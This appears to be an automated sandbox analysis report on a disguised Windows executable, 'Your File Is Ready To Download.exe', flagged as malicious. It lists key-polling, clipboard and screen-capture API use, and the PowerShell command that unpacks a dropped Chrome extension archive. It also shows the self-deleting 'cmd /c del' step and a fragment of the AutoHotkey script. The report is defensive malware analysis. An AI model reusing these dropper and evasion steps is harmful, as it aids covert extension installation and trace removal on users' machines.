Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.217.81.204:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400063F0 GetClipboardFormatNameW,GetClipboardData,1_2_00000001400063F0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,1_2_0000000140054730
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140001B0C GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,1_2_0000000140001B0C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140016300 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,1_2_0000000140016300
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140006510 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,1_2_0000000140006510

System Summary:

barindex
Sample or dropped binary is a compiled AutoHotkey binaryShow sources
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeWindow found: window name: AutoHotkeyJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00000001400810B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001E3101_2_000000014001E310
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400883601_2_0000000140088360
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400484901_2_0000000140048490
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140018A201_2_0000000140018A20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001EB301_2_000000014001EB30
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140014BA01_2_0000000140014BA0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140016D901_2_0000000140016D90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014000CF501_2_000000014000CF50
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400052301_2_0000000140005230
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001F3001_2_000000014001F300
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400855301_2_0000000140085530
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400415D01_2_00000001400415D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D17241_2_00000001400D1724
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D57CC1_2_00000001400D57CC
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007D8A01_2_000000014007D8A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001F9191_2_000000014001F919
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400559501_2_0000000140055950
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140001B0C1_2_0000000140001B0C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140059D201_2_0000000140059D20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014001FD1E1_2_000000014001FD1E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001401240001_2_0000000140124000
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007C03F1_2_000000014007C03F
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400700601_2_0000000140070060
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D80741_2_00000001400D8074
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400281201_2_0000000140028120
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014000A1201_2_000000014000A120
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400501351_2_0000000140050135
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005C1401_2_000000014005C140
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014004C1601_2_000000014004C160
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400581A01_2_00000001400581A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400741C01_2_00000001400741C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400762001_2_0000000140076200
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400802301_2_0000000140080230
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005E2501_2_000000014005E250
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009825C1_2_000000014009825C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014002A2C01_2_000000014002A2C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400A82F01_2_00000001400A82F0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014006E3801_2_000000014006E380
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400503A41_2_00000001400503A4
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400523B01_2_00000001400523B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400404101_2_0000000140040410
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400BA53B1_2_00000001400BA53B
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014000A5401_2_000000014000A540
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007A5701_2_000000014007A570
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400CE59C1_2_00000001400CE59C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008E5B01_2_000000014008E5B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400605B91_2_00000001400605B9
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400DC5FC1_2_00000001400DC5FC
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400586601_2_0000000140058660
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400BC6701_2_00000001400BC670
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400746801_2_0000000140074680
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400206801_2_0000000140020680
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400326811_2_0000000140032681
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400986A11_2_00000001400986A1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400466C01_2_00000001400466C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008C6C31_2_000000014008C6C3
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400547301_2_0000000140054730
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014004A7401_2_000000014004A740
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400BA7601_2_00000001400BA760
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D07B01_2_00000001400D07B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400027BB1_2_00000001400027BB
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400507D01_2_00000001400507D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007E8301_2_000000014007E830
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400448D01_2_00000001400448D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007A8E01_2_000000014007A8E0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014006C8F01_2_000000014006C8F0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400A29001_2_00000001400A2900
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400649501_2_0000000140064950
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400989AD1_2_00000001400989AD
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400929C01_2_00000001400929C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140034A151_2_0000000140034A15
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EA201_2_000000014008EA20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140062A601_2_0000000140062A60
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140012A901_2_0000000140012A90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140070AD01_2_0000000140070AD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005AB701_2_000000014005AB70
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140060B801_2_0000000140060B80
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014003EBC01_2_000000014003EBC0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400DCBE01_2_00000001400DCBE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140084C001_2_0000000140084C00
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400D4C181_2_00000001400D4C18
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009CC501_2_000000014009CC50
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140006C601_2_0000000140006C60
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008CC901_2_000000014008CC90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005CC901_2_000000014005CC90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140034CA51_2_0000000140034CA5
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400B0CD01_2_00000001400B0CD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014004ECD01_2_000000014004ECD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140056CE01_2_0000000140056CE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140010CF01_2_0000000140010CF0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009ED001_2_000000014009ED00
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005ED301_2_000000014005ED30
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140058D701_2_0000000140058D70
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014004ADC01_2_000000014004ADC0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400AEE301_2_00000001400AEE30
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140038E2C1_2_0000000140038E2C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007CE481_2_000000014007CE48
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140050E901_2_0000000140050E90
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140070EA11_2_0000000140070EA1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_0000000140062ED01_2_0000000140062ED0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EF7D1_2_000000014008EF7D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EF8C1_2_000000014008EF8C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EFA81_2_000000014008EFA8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EFCA1_2_000000014008EFCA
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EFEB1_2_000000014008EFEB
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005F0001_2_000000014005F000
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008EFF71_2_000000014008EFF7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008F01D1_2_000000014008F01D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400730501_2_0000000140073050
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400990481_2_0000000140099048
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014008F05E1_2_000000014008F05E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400870911_2_0000000140087091
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005B0B01_2_000000014005B0B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400B70E01_2_00000001400B70E0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400911081_2_0000000140091108
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014003F1301_2_000000014003F130
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007B14E1_2_000000014007B14E
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400251541_2_0000000140025154
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400891801_2_0000000140089180
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400651801_2_0000000140065180
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400531B01_2_00000001400531B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400431B01_2_00000001400431B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400031C31_2_00000001400031C3
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014006F1D01_2_000000014006F1D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014004D2001_2_000000014004D200
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400C72201_2_00000001400C7220
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400192301_2_0000000140019230
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: String function: 0000000140040160 appears 291 times
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: String function: 00000001400C8EEC appears 174 times
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: String function: 000000014003FE10 appears 37 times
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014005EF30: CreateFileW,DeviceIoControl,CloseHandle,1_2_000000014005EF30
Source: Your File Is Ready To Download.exeBinary or memory string: OriginalFilename vs Your File Is Ready To Download.exe
Source: Your File Is Ready To Download.exe, 00000001.00000000.282201544.0000000140127000.00000002.00020000.sdmpBinary or memory string: OriginalFilename vs Your File Is Ready To Download.exe
Source: Your File Is Ready To Download.exeBinary or memory string: OriginalFilename vs Your File Is Ready To Download.exe
Source: Your File Is Ready To Download.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Your File Is Ready To Download.exeVirustotal: Detection: 19%
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Your File Is Ready To Download.exe "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome'Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximizedJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00000001400810B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: C:\Users\user\AppData\Roaming\chromeext.zipJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mstg0eih.qml.ps1Jump to behavior
Source: classification engineClassification label: mal51.evad.winEXE@41/255@6/8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014007E830 CoInitialize,CoCreateInstance,malloc,malloc,malloc,malloc,malloc,malloc,CoUninitialize,1_2_000000014007E830
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile read: C:\Program Files\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400605B9 wcsncpy,GetDiskFreeSpaceW,GetLastError,malloc,1_2_00000001400605B9
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400415D0 CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,CloseHandle,GetLastError,FormatMessageW,1_2_00000001400415D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeMutant created: \Sessions\1\BaseNamedObjects\AHK Mouse
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeMutant created: \Sessions\1\BaseNamedObjects\AHK Keybd
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_01
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_00000001400203C0 FindResourceW,FindResourceW,SizeofResource,LoadResource,LockResource,1_2_00000001400203C0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: Your File Is Ready To Download.exeString found in binary or memory: exe"){ WinClose, ahk_exe chrome.exe Sleep 100 } Run, chrome.exe --start-maximized Sleep 100 st = ahk_class Chrome_WidgetWin_1 WinWait, %st% IfWinNotActive, %st%,, WinActivate, %st% WinGet, WinStatus, MinMax, %st% if (WinStatus != 0) WinRestore, ahk_exe chrome.
Source: Your File Is Ready To Download.exeString found in binary or memory: Run, chrome.exe --start-maximized
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Your File Is Ready To Download.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Your File Is Ready To Download.exeStatic file information: File size 1217816 > 1048576
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
Source: Your File Is Ready To Download.exeStatic PE information: certificate valid
Source: Your File Is Ready To Download.exeStatic PE information: section name: text
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeCode function: 1_2_000000014009E010 SendMessageW,SendMessageW,SendMessageW,LoadLibraryW,GetProcAddress,SendMessageW,SendMessageW,SendMessageW,1_2_000000014009E010
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exeFile created: \your file is ready to download.exe
